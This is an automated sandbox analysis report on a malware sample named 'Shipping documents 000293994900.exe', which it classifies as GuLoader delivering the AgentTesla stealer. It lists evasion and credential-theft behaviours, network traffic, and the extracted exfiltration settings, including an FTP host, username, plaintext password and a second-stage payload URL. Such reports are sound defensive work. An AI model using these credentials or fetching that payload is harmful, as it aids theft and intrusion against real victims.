Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping documents 000293994900.exe

Overview

General Information

Sample name:Shipping documents 000293994900.exe
Analysis ID:1546020
MD5:c8d26f7208eaaa31a839ec190489c9a1
SHA1:c9bc4695a4f4afdcc89d216b7ad8d0ce4d0bc7e3
SHA256:f96b6c703fe5b13fd985d91da265c58d3d5b2f81397ebe27527e59c208819d2e
Tags:exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.3041044972.0000000006125000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Shipping documents 000293994900.exe PID: 6496JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T11:39:18.753332+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549704TCP
            2024-10-31T11:39:59.461244+010020229301A Network Trojan was detected4.175.87.197443192.168.2.556127TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T11:40:48.544514+010028032702Potentially Bad Traffic192.168.2.55619484.38.133.4280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Shipping documents 000293994900.exe.5436.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: Shipping documents 000293994900.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:56195 version: TLS 1.2
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0040276E FindFirstFileW,4_2_0040276E
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405770
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0040622B FindFirstFileW,FindClose,4_2_0040622B
            Source: Joe Sandbox ViewIP Address: 192.185.13.234 192.185.13.234
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:56194 -> 84.38.133.42:80
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49704
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:56127
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /FZBmQQQpasdj30.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /FZBmQQQpasdj30.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3304876105.0000000006DC0000.00000004.00001000.00020000.00000000.sdmp, Shipping documents 000293994900.exe, 00000004.00000002.3304583690.0000000005426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.133.42/FZBmQQQpasdj30.bin
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: Shipping documents 000293994900.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: Shipping documents 000293994900.exe, 00000000.00000002.3040528511.0000000002843000.00000004.00000020.00020000.00000000.sdmp, nsj89C.tmp.0.dr, 660.jpg.0.drString found in binary or memory: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg
            Source: unknownNetwork traffic detected: HTTP traffic on port 56195 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56195
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:56195 version: TLS 1.2
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Shipping documents 000293994900.exe
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_00403358
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_00404B0E0_2_00404B0E
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_0040653D0_2_0040653D
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_00404B0E4_2_00404B0E
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0040653D4_2_0040653D
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0016A2144_2_0016A214
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0016E3604_2_0016E360
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_00164A584_2_00164A58
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0016AAAA4_2_0016AAAA
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_00163E404_2_00163E40
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_001641884_2_00164188
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_0016DA784_2_0016DA78
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_37FECE214_2_37FECE21
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_37FEBB904_2_37FEBB90
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_37FEA7DC4_2_37FEA7DC
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388D31584_2_388D3158
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388DB2F04_2_388DB2F0
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388DC2404_2_388DC240
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388D56A04_2_388D56A0
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388D66C04_2_388D66C0
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388D7E404_2_388D7E40
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388D00404_2_388D0040
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388D23704_2_388D2370
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388DE4684_2_388DE468
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388D5DB74_2_388D5DB7
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_388D77604_2_388D7760
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_38CA2B984_2_38CA2B98
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: String function: 00402B38 appears 47 times
            Source: Shipping documents 000293994900.exe, 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekinglet.exe> vs Shipping documents 000293994900.exe
            Source: Shipping documents 000293994900.exe, 00000004.00000000.3037015443.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekinglet.exe> vs Shipping documents 000293994900.exe
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3304583690.000000000546E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Shipping documents 000293994900.exe
            Source: Shipping documents 000293994900.exe, 00000004.00000002.3323761608.00000000355C9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Shipping documents 000293994900.exe
            Source: Shipping documents 000293994900.exeBinary or memory string: OriginalFilenamekinglet.exe> vs Shipping documents 000293994900.exe
            Source: Shipping documents 000293994900.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@2/3
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile created: C:\Users\user\UploadableJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile created: C:\Users\user\AppData\Local\Temp\nsu88C.tmpJump to behavior
            Source: Shipping documents 000293994900.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile read: C:\Users\user\Desktop\Shipping documents 000293994900.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Shipping documents 000293994900.exe "C:\Users\user\Desktop\Shipping documents 000293994900.exe"
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess created: C:\Users\user\Desktop\Shipping documents 000293994900.exe "C:\Users\user\Desktop\Shipping documents 000293994900.exe"
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess created: C:\Users\user\Desktop\Shipping documents 000293994900.exe "C:\Users\user\Desktop\Shipping documents 000293994900.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.3041044972.0000000006125000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_37FE3FD0 push 2438C7DAh; retf 4_2_37FE3FD5
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeCode function: 4_2_38CA057F push dword ptr [edi]; ret 4_2_38CA0590
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeFile created: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping documents 000293994900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
